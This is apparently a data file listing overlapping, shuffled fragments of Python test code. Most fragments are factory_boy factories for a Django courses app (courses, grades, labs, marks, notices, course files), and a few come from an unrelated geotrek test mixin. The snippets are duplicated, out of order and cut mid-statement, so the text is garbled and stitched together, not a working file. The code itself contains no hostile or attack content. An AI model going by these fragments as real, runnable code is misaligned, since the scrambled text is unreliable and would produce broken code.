"= fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65 date",
"create: return if extracted: for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(),",
"= factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' )",
"i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation",
"k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture",
"models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text')",
"has_exam = False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language =",
"PROFILE_CHOICES from tests.users import factories as users_factories from users import models as users_models",
"teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5",
"'123' has_exam = False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language",
"factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False",
"fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for",
"CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description",
"import factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses import",
"for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name =",
"= fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width':",
"fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if extracted:",
"%03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation",
"student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice",
"course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at",
"fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory)",
"= fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher =",
"factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course =",
"= factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory):",
"self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda n: \"Course",
"models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory)",
"factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) )",
"[x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class",
"= fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i",
"factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses import models from courses.models",
"fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65 date =",
"LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model =",
"create: return if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta:",
"= fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model",
"laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content",
"models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model =",
"create, extracted, **kwargs): if not create: return if extracted: for student in extracted:",
"teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers:",
"if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model =",
"= models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text')",
"NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title",
"factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark =",
"grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i for",
"create: return if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(),",
"self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory):",
"datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course",
"CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file",
"factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses import models",
"Meta: model = models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n) description",
"k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course",
"import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from users import models",
"= 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student =",
"model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda",
"= factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i for i",
"model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date",
"Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class",
"5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory)",
"range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not create: return if",
"models as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0]",
"fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for",
"courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from users import",
"in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta:",
"course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today()",
"models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text')",
"factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class",
"LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from users import models as",
"as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for",
"teachers(self, create, extracted, **kwargs): if not create: return if extracted: for teacher in",
"for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory):",
"models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher",
"random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title",
"name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return",
"class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory)",
"= models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model",
"in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher)",
"ContentFile from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import",
"extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group",
"models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from",
"= fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model",
"fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model =",
"mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student",
"= fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() +",
"= factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() -",
"n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self,",
"class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title =",
"semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours =",
"student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name =",
"factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i",
"**kwargs): if not create: return if extracted: for student in extracted: self.students.add(student) class",
"fuzzy from django.core.files.base import ContentFile from courses import models from courses.models import LANGUAGE_CHOICES,",
"= fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher",
"= models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course =",
"create, extracted, **kwargs): if not create: return if extracted: for teacher in extracted:",
"fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if extracted:",
"sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class",
"n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile =",
"**kwargs): if not create: return if extracted: for teacher in extracted: self.teachers.add(teacher) else:",
"mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student",
"courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as",
"in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory)",
"class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text')",
"head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester",
"@factory.post_generation def teachers(self, create, extracted, **kwargs): if not create: return if extracted: for",
"content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment",
"labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted,",
"random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model =",
"_: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at =",
"models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory)",
"datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name",
"course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date",
"users import models as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES",
"ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at = fuzzy.FuzzyDate(datetime.date.today())",
"from tests.users import factories as users_factories from users import models as users_models PROFILE_CHOICES",
") class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def",
"= factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark",
"= models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date =",
") class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name =",
"return if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5)",
"for i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not",
"if not create: return if extracted: for student in extracted: self.students.add(student) else: random_students",
"datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation",
"name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor =",
"in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student)",
"class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self,",
"return if extracted: for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10)",
"class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16)",
"else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class",
"= random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model",
"class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory):",
"= factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory):",
"import random import factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from",
"import factories as users_factories from users import models as users_models PROFILE_CHOICES = [x[0]",
"def students(self, create, extracted, **kwargs): if not create: return if extracted: for student",
"False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours",
"model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content",
"as users_factories from users import models as users_models PROFILE_CHOICES = [x[0] for x",
"fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if",
"in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1,",
"extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class",
"= 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student =",
"factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class",
"= models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _:",
"from users import models as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES]",
"description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height':",
"factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate(",
"for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name",
"created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory)",
"import datetime import random import factory import factory.fuzzy as fuzzy from django.core.files.base import",
"= factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description",
"= factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600}",
"description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class",
"description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam",
"Meta: model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text')",
"= fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta:",
"factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade",
"in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def",
"extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher",
"fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100),",
"model = models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n) description =",
"class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today())",
"from django.core.files.base import ContentFile from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES",
"= factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at =",
"description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), )",
"model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course",
"= models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title =",
"fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model =",
"\"Course %02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory)",
"teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course =",
"CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda n: \"Course %02d\" %",
"models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not create:",
"factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark =",
"fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600,",
"Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text')",
"= factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory):",
"deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta:",
"title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta:",
"= models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object')",
"x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda",
"= factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester =",
"range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])",
"= fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i",
"random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta:",
"random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model =",
"+ datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16)",
"= factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model",
"lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at",
"600, 'height': 600} ), 'example.jpg' ) ) created_at = fuzzy.FuzzyDate(datetime.date.today()) updated_at = fuzzy.FuzzyDate(datetime.date.today())",
"class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today())",
"factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100),",
"n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123'",
"group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today()",
"start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model =",
"%02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu",
"GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" %",
"+ datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory)",
"for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i",
"date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class",
"model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course",
"= factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model"
] |
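The row above reassembles into a factory_boy module for a courses app. As a minimal sketch of how these factories might be exercised from a Django test (the import paths courses.factories and users.factories are assumptions, not shown in the source):

from django.test import TestCase

from courses.factories import CourseFactory  # hypothetical module path
from users.factories import TeacherFactory   # hypothetical module path


class CourseFactoryTests(TestCase):
    def test_course_gets_random_teachers(self):
        # The `teachers` post_generation hook samples existing Teacher rows
        # with random.choices(), so some must exist before the factory runs.
        TeacherFactory.create_batch(5)
        course = CourseFactory()
        # random.choices() samples with replacement, so the M2M relation ends
        # up with between 1 and 5 distinct teachers.
        self.assertTrue(1 <= course.teachers.count() <= 5)

    def test_explicit_teachers_override_the_random_sample(self):
        # Passing teachers=... routes the list into the hook's `extracted`
        # argument, bypassing the random sampling branch.
        teachers = TeacherFactory.create_batch(2)
        course = CourseFactory(teachers=teachers)
        self.assertEqual(course.teachers.count(), 2)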
[
"not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj =",
"-*- encoding: utf-8 -*- from django.utils import translation from django.utils.translation import ugettext as",
"encoding: utf-8 -*- from django.utils import translation from django.utils.translation import ugettext as _",
"NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest",
"def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code,",
"def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def",
"utf-8 -*- from django.utils import translation from django.utils.translation import ugettext as _ #",
"import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def",
"import translation from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models",
"geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory",
"self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure,",
"MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.')",
"self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure) self.client.post(obj.get_update_url(), self.get_good_data()) self.assertEqual(obj.structure, structure)",
"# -*- encoding: utf-8 -*- from django.utils import translation from django.utils.translation import ugettext",
